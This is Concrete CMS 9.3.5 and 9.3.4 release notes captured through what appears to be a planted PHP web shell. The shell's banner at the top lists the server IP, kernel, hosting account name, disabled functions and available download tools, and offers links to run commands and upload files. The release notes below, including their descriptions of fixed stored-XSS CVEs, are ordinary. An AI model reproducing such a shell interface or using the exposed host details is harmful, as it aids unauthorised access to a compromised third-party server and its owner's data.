|
Server IP : 185.61.155.44 / Your IP : 3.133.115.47 Web Server : LiteSpeed System : Linux premium145.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : antommvy ( 964) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /var/softaculous/elgg4/../bludit/../egroup/../presta14/../qcms/../ospos/../conc8/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
9.3.5 Release Notes
New Features
Added a Dashboard page for “File Chooser Options” on which you can configure the file chooser tab you want to be the default (thanks Mesuva)
Added a new checkbox to enable “hreflang” on multilingual websites to the Multilingual Setup page (thanks leal-k)
Behavioral Improvements
Replaced some uses of “concrete5” with Concrete throughout the codebase (thanks mlocati)
Added width and height attributes to the image block and to some image thumbnails in order to reduce layout shift on load (thanks katalysis)
Bug Fixes
Fixed some bugs that could occur when saving topic and Express attribute types (thanks alecbiela)
Fixed issue where Auto-Nav and Express Form blocks couldn’t be edited or previewed reliably in global areas.
Checkbox for Exclude from Nav attributes are now translated properly (thanks leal-k)
Fixed bug where the “Schedule” button in the composer page schedule dialog did nothing.
Fixed bug in Top Navigation Bar block where clicking on items with sub-pages would not take you to the page.
Fixed bug where block help dialog was not shown in Firefox (thanks alecbiela)
Fixed: Unsetting form redirect destination throws error
Fixed: Incorrect variable name in Youtube block
Fix typo in DeleteGroupCommandHandler.php (thanks mlocati)
Fixed: Cannot remove email notification from Form Block (thanks lea-k)
Fixed: Swagger interactive API console fails to update page except for Super-admin
Fixed bug in topic attribute export if no value was set (thanks RLHawk1)
Developer Updates
Add Support for Javascript "module" and "importmap" types to the Asset System (thanks alecbiela)
Improved output of the LatestMigrationTest unit test (thanks mlocati)
Tweaks to API documentation (thanks dimger)
List pages and view page children API methods now require canViewPage permission instead of canViewPageInSitemap.
9.3.4 Release Notes
New Features
Added the ability to search pages by their cache settings in the advanced page search (thanks SashaMcr)
Behavioral Improvements
Added Discord to Social Links (thanks RLHawk1)
We now require the redirect URL when adding a new API integration (thanks mlocati)
Canonical URL is now validated when saving (thanks hissy)
Bug Fixes
Fixed some errors in the Add block dialog on the Stacks Dashboard page when running Concrete in strict mode (thanks mlocati)
You can no longer choose Guest or Registered Users as groups to assign to users (which you shouldn’t have been able to do.)
Fixed canonical URL sometimes not included a path to a subdirectory if the Concrete installation is in a subdirectory (thanks biplobice)
Fixed: When selecting a topic to filter ExpressList, the previously selected topic remains (thanks hissy)
c5:package:install CLI command: pass install options to install method (thanks mlocati)
Developer Updates
Top Navigation Bar should work better on non-Bedrock themes (thanks RLHawk1)
Some removals of deprecated Core::make() code from the core.
Enhance c5:package:pack Command to Allow Flexible Output Path Without Requiring Zip File Name (thanks biplobice)
Security Updates
Fixed CVE-2024-8291 Stored XSS in Image Editor Background Color by sanitizing output of "Save Background Image Colour" in file thumbnail dashboard single page with commit dbce253166f6b10ff3e0c09e50fd395370b8b065 for version 8 and commit 12183 for version 9. The Concrete CMS Security Team gave this a CVSS v4 score of 2.1 with vector CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N Prior to the fix a rogue admin could add malicious code to the Thumbnails/Add Type. Thanks Alexey Solovyev for reporting HackerOne 921527.
Fixed CVE-2024-7398 Stored XSS Vulnerability in Calendar Event Addition Feature with commit 7c8ed0d1d9db0d7f6df7fa066e0858ea618451a5 for version 8 and commits 12183 and 12184 for version 9. The Concrete CMS Security Team gave this vulnerability a CVSS v4 score of 1.8 with vector VSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N Prior to the fix, the calendar event name was not sanitized on output. Users or groups with permission to create event calendars could embed scripts and users or groups with permission to modify event calendars could execute scripts. Thank you Yusuke Uchida for reporting HackerOne 2400810.
Fixed CVE-2024-8660 Stored XSS in in the "Top Navigator Bar" block with commit 12128. The Concrete CMS Security Team gave this vulnerability a CVSS v4 score of 4.6 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N Prior to the fix,a rogue admin could add a malicious payload. Since "Top Navigator Bar" output was not sufficiently sanitized, the payload could be executed when targeted users visited the home page. This does not affect Versons below 9 since they do not have the Top Navigation Bar Block. Thanks Chu Quoc Khanh for reporting HackerOne 2610205
Fixed CVE-2024-8661 Stored XSS in the "Next&Previous Nav" block with commit 12204 for version 9 and with commit ce5ee2ab83fe8de6fa012dd51c5a1dde05cb0dc4 for version 8. The Concrete CMS Security Team gave this vulnerability a CVSS v4 score of 4.6 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Prior to the fix, a rogue admin could add a malicious payload. Since the "Next&Previous Nav" block output was not sufficiently sanitized, the malicious payload could be executed in the browsers of targeted users. Thanks Chu Quoc Khanh for reporting HackerOne 2610205